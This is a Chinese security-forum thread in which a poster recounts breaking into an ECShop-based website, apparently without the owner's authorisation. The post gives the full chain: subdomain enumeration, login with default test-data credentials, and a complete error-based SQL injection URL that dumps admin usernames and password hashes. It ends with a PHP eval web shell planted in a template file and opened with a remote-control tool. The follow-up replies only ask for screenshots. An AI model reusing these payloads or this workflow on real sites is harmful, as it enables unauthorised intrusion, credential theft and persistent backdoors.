查看: 12618|回复: 4

申请转正

[复制链接]

该用户从未签到

发表于 2014-5-26 16:50:44 | 显示全部楼层 |阅读模式
##########################################
#  Title    :帮朋友 搞站(08sec申请转正帖)
#  Time   : 2014年5月26日
#  Team  :  
#  Author : 蜗牛
#  首发   : 08安全小组
#图片 在本地, 传不上去纠结
#######################################
目标站点:
www.xx.cn

KaLi
dnsrecon -d xx.cn -g --google --lifetime 30

结果:
www.xx.cn  =>  4.4.4.4
sp.xx.cn  => 3.3.3.11
down.xx.cn => 4.1.1.1
mail.xx.cn => 3.3.37.3
service.xx.cn =>3.3.4.2

看IP格式 ,sp.xx.cn mail.xx.cn  service.xx.cn 都是 3.3.3.* 像一个网段的。
主站 www.xx.cn 的IP 和 down.xx.cn 的IP没有规律。

顺手访问了一下 :down.xx.cn
1.png

第一眼看,感觉有戏,可以列目录。上面好多rar的文件,打包下载下来发现 都是游戏资源,再结合二级目录的名字 这个很可能是游戏资源服务器,搞下来意义不大,一般游戏资源服务器都做了cdn。结果证明了猜测是正确的。
直接把 down.xx.cn 域名都放 http://ping.aizhan.com/ 上面,想通过各地ping域名看一下,看得到的结果是否同一个IP 来判断单个的域名是否用了CDN,结果正是我的猜测。


2.png


。。。。。。。。宁愿我猜错了。。。
把主站和二级域名都放上去。各地ping一下 ,最终得到结果。

www.xx.com
down.xx.com
2个域名使用了 CDN

mail.xx.cn
service.xx.cn
sp.xx.cn
这3个没使用CDN

分别访问 这3个域名:
mail.xx.cn 无法访问,其实对于这个是没有患有任何希望的,  mail差不多就告诉我结果。
service.xx.cn  访问显示一片空白。
访问  sp.xx.cn 出来了
3.png

一看这个界面,我笑了。 默认账号密码登录失败。。
FUCK
看来管理员安全意识还是有的,即使是这样的开发测试版本都知道换后台的帐号密码。。 不过 既然 安装了ecshop的时候默认安装了测试数据,那么 哈哈!
默认安装ecshop测试数据的话,在后台会有2个帐号:
shhaigonghuo1   密码shhaigonghuo1  
帐号bjgonghuo1  密码shhaigonghuo1
果断尝试这其中一个,成功登录进去了。。。。
可是  后台权限太小了,不过我记得前段时间出过一个 很鸡肋的ecshop后台注入漏洞的。

直接:http://sp.xx.cn/admin/affiliate_ ... 28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

果断出来密码了
4.png

md5居然是收费的,  不过能出来密码算是不错
6.png

帮买了直接 。直接admin 登录上去。

报错 不出路径,服务器上屏蔽了报错信息了,看来插入数据库走不通了,看菜单栏选项里面的库项目管理存在,顿时了起来了。。

模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容最后面加入一句话代码:<?php eval($_POST[1]);?>
菜刀链接http://www.xx.cn/myship.php 成功。
9.png

只能说运气了。






回复

使用道具 举报

  • TA的每日心情
    无聊
    2015-6-15 22:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2014-5-26 21:30:45 | 显示全部楼层
    上个图吧

    点评

    图以上 。。。  详情 回复 发表于 2014-5-27 12:59
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2014-5-27 09:45:22 | 显示全部楼层
    发个邮箱  word文档直接发你邮箱吧 。这个好像不能穿本地的图片上来

    点评

    admin2@08sec.org  发表于 2014-5-27 10:51
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2014-5-27 12:59:01 | 显示全部楼层

    图以上 。。。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 15:35 , Processed in 0.035553 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部